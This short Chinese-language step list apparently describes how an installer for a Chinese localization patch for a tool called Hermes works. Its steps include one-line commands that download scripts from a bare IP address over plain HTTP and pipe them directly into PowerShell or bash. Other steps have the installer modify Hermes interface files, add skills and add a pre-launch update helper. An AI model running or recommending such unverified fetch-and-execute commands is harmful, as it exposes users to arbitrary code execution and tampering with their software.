1. 用户发送：“请访问 useai.live/hermes 安装汉化补丁”。
2. Windows 新手下载 `http://47.121.138.43/hermes/Hermes-zh-CN-Setup.exe?v=20260612-exe-3` 后运行；高级用户可执行：`irm http://47.121.138.43/hermes/install.ps1 | iex`。
3. macOS 新手下载 `http://47.121.138.43/hermes/hermes-macos-installer.zip?v=20260612-mac-1`，解压后打开 `install.command`。
4. Linux、WSL2 用户执行：`curl -fsSL http://47.121.138.43/hermes/install.sh | bash -s -- --include-desktop`。
5. 安装器检测本机 Hermes。
6. 未检测到 Hermes 时，安装器执行官方安装脚本。
7. 安装器检测 Hermes 版本，0.16.x、0.15.x、0.14.x 和 0.13.x 使用对应包，失败或旧版使用 legacy 包。
8. 安装器校验 SHA256。
9. 安装器设置 `display.language=zh`。
10. 安装器写入中文增强技能。
11. 安装器备份并修改 Hermes 可见界面文件。
12. 安装器写入启动前更新辅助。
